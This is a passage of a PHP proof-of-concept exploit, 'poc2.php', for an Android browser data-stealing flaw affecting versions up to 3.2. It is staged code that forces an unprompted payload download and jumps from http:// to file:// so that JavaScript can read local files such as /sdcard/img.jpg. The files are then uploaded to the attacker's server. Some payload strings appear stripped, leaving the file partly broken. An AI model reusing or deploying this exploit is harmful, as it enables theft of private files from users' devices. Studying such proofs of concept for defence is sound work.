=4.0 did not allow redirecting to file:// by sending a header in testing * Author: Thomas Cannon * Advisory: (For vulns 1 & 2) : http://thomascannon.net/blog/2010/11/android-data-stealing-vulnerability/ * http://www.exploit-db.com/exploits/18164/ * (For vuln 3, and more on 1 & 2) : http://www.80vul.com/android/android-0days.txt * * Filename: poc2.php * Instructions: Specify files you want to upload in filenames array. Host this php file * on a server and visit it using the Android Browser. Some builds of Android * may require adjustments to the script, e.g. because payload downloads as .htm instead of .html * * Tested on: Android 2.3 & Android 3.2 (Emulators) */ // List of the files on the device that we want to upload to our server $filenames = array("/proc/version", "/sdcard/img.jpg"); // Determine the full URL of this script $protocol = $_SERVER["HTTPS"] == "on" ? "https" : "http"; $scripturl = $protocol."://".$_SERVER["HTTP_HOST"].$_SERVER["SCRIPT_NAME"]; // Stage 0: Display introduction text and a link to start the PoC. function stage0($scripturl) { echo "Android <= 3.2
Data Stealing Web Page

Click: Malicious Link"; } // Stage 1: Redirect to Stage 2 which will force a download of the HTML/JS payload, then a few seconds later redirect // to the payload. We load the payload using by using an iframe to allow the browser to jump protocols from http:// to file:// // The JavaScript in the payload is then executed in the context of the local device. function stage1($scripturl) { echo ""; } // Stage 2: Download of payload, the Android browser doesn't prompt for the download which is another vulnerability. // The payload uses AJAX calls to read file contents and encodes as Base64, then uploads to server (Stage 3). function stage2($scripturl,$filenames) { header("Cache-Control: public"); header("Content-Description: File Transfer"); header("Content-Disposition: attachment; filename=poc.html"); header("Content-Type: text/html"); header("Content-Transfer-Encoding: binary"); ?> files.txt!"; } // Cross protocol: Allow the browser to jump from http:// to file://. function crossProtocol() { header("Location:file:///"); } // Select the stage to run depending on the parameter passed in the URL switch($_GET["stage"]) { case "1": stage1($scripturl); break; case "2": stage2($scripturl,$filenames); break; case "3": stage3(); break; case "cross-protocol": crossProtocol(); break; default: stage0($scripturl); break; } ?>